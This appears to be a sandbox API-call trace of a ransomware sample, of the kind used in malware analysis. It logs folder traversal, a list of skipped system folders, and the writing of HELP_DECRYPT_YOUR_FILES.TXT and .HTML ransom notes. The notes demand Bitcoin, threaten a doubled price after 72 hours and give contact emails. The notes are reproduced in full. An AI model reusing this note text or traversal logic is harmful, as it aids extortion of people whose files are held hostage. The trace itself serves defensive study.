	[0179.934] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a0f3e0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0179.934] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.934] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.935] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music"
	[0179.935] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Music\\*.*") returned="C:\\Users\\Default\\Music\\*.*"
	[0179.935] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.935] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.935] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 50
	[0179.935] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.939] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.939] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.941] CloseHandle (hObject=0x380) returned 1
	[0179.942] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.942] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.943] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.944] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.944] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.944] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.944] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.944] CloseHandle (hObject=0x380) returned 1
	[0179.945] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.945] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.945] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.945] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 51
	[0179.945] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.948] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.948] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.950] CloseHandle (hObject=0x380) returned 1
	[0179.951] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.951] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.952] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.968] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.968] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.968] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.968] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.969] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.969] CloseHandle (hObject=0x380) returned 1
	[0179.969] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*" (normalized: "c:\\users\\default\\music\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x84a0f3e0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a0f3e0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.970] lstrlenW (lpString="C:\\Users\\Default\\Music\\*.*") returned 26
	[0179.970] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.970] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Music\\*.*", cchLength=0x1a | out: lpsz="c:\\users\\default\\music\\*.*") returned 0x1a
	[0179.970] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.971] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="windows") returned 0x0
	[0179.971] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.971] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="boot") returned 0x0
	[0179.971] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.971] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="system volume information") returned 0x0
	[0179.971] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.972] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.972] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.972] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="temp") returned 0x0
	[0179.972] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.972] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="program files") returned 0x0
	[0179.972] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.973] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.973] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="appdata") returned 0x0
	[0179.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.973] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="application data") returned 0x0
	[0179.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.974] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="winnt") returned 0x0
	[0179.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.974] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="tmp") returned 0x0
	[0179.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.974] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="cache") returned 0x0
	[0179.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.975] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.975] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="webcache") returned 0x0
	[0179.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.975] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="inetcache") returned 0x0
	[0179.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.976] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="nvidia") returned 0x0
	[0179.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.976] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="packages") returned 0x0
	[0179.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.976] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="cookies") returned 0x0
	[0179.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.977] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="programdata") returned 0x0
	[0179.977] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.977] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.977] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x84a0f3e0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a0f3e0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.977] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.977] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a0f3e0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a0f3e0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84cb99a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.977] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84c93627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.977] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84c93627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0179.978] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.978] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.978] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1
	[0179.978] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1
	[0179.979] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1
	[0179.979] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.979] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.979] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents"
	[0179.979] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents"
	[0179.979] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\"
	[0179.979] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\My Documents\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\"
	[0179.979] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\My Documents\\*.*") returned="C:\\Users\\Default\\My Documents\\*.*"
	[0179.980] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*" (normalized: "c:\\users\\default\\my documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84c93627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0179.980] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.980] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents"
	[0179.980] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\My Documents\\*.*") returned="C:\\Users\\Default\\My Documents\\*.*"
	[0179.980] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.981] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.981] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\My Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0179.981] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\my documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.984] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.984] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.993] CloseHandle (hObject=0x380) returned 1
	[0179.994] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.995] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.996] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.996] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\my documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.996] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.996] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.997] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.997] CloseHandle (hObject=0x380) returned 1
	[0179.997] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.997] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.998] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.998] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\My Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0179.998] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\my documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.001] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.001] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.003] CloseHandle (hObject=0x380) returned 1
	[0180.004] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.004] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
